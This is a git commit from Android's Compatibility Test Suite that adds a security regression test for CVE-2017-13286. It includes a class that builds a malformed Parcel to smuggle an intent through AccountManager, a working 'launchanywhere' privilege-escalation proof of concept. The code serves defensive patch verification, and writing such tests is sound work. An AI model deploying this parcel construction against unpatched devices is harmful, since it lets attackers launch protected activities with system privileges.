diff options
author | android-build-team Robot <android-build-team-robot@google.com> | 2019-01-16 01:02:15 +0000 |
---|---|---|
committer | android-build-team Robot <android-build-team-robot@google.com> | 2019-01-16 01:02:15 +0000 |
commit | 30af8b9fe3852ceabadb27c73dbbdd10d55c6f81 (patch) | |
tree | 559d248be670e890ae393b67c7768a5741106161 | |
parent | 7fec2b88c4a8b1644d530b0305b919b0d9fea299 (diff) | |
parent | d43b48941dd4754dfef5fc7badea159910333fb4 (diff) | |
download | cts-pie-b4s4-release.tar.gz |
Snap for 5234907 from d43b48941dd4754dfef5fc7badea159910333fb4 to pi-b4s4-releaseandroid-9.0.0_r39android-9.0.0_r38pie-b4s4-release
Change-Id: I3792efe3136bbc871e4ad33541105a13a525ccb8
2 files changed, 110 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java new file mode 100644 index 00000000000..02436e7193a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java @@ -0,0 +1,32 @@ +/** + * Copyright (C) 2018 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.runner.RunWith; + +public class Poc18_04 extends SecurityTestCase { + /** + * b/69683251 + * Does not require root but must be a hostside test to avoid + * a race condition + */ + @SecurityTest(minPatchLevel = "2018-04") + public void testPocCVE_2017_13286() throws Exception { + LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java new file mode 100644 index 00000000000..752b06de67c --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java @@ -0,0 +1,78 @@ +/** + * Copyright (C) 2018 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.launchanywhere; + +import com.android.security.cts.launchanywhere.IGenerateMalformedParcel; +import android.accounts.AccountManager; +import android.content.Intent; +import android.os.Parcel; + +public class CVE_2017_13286 implements IGenerateMalformedParcel { + @Override + public Parcel generate(Intent intent) { + Parcel data = Parcel.obtain(); + data.writeInterfaceToken("android.accounts." + + "IAccountAuthenticatorResponse"); + data.writeInt(1); + int bundleLenPos = data.dataPosition(); + data.writeInt(0xffffffff); + data.writeInt(0x4C444E42); + int bundleStartPos = data.dataPosition(); + data.writeInt(3); + + data.writeString("launchanywhere"); + data.writeInt(4); + data.writeString("android.hardware.camera2.params.OutputConfiguration"); + data.writeInt(0); + data.writeInt(1); + data.writeInt(2); + data.writeInt(3); + data.writeInt(4); + data.writeInt(5); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(13); + + int byteArrayLenPos = data.dataPosition(); + data.writeInt(0xffffffff); + int byteArrayStartPos = data.dataPosition(); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeString(AccountManager.KEY_INTENT); + data.writeInt(4); + data.writeString("android.content.Intent"); + intent.writeToParcel(data, 0); + int byteArrayEndPos = data.dataPosition(); + data.setDataPosition(byteArrayLenPos); + int byteArrayLen = byteArrayEndPos - byteArrayStartPos; + data.writeInt(byteArrayLen); + data.setDataPosition(byteArrayEndPos); + + int bundleEndPos = data.dataPosition(); + data.setDataPosition(bundleLenPos); + int bundleLen = bundleEndPos - bundleStartPos; + data.writeInt(bundleLen); + data.setDataPosition(bundleEndPos); + + return data; + } +} |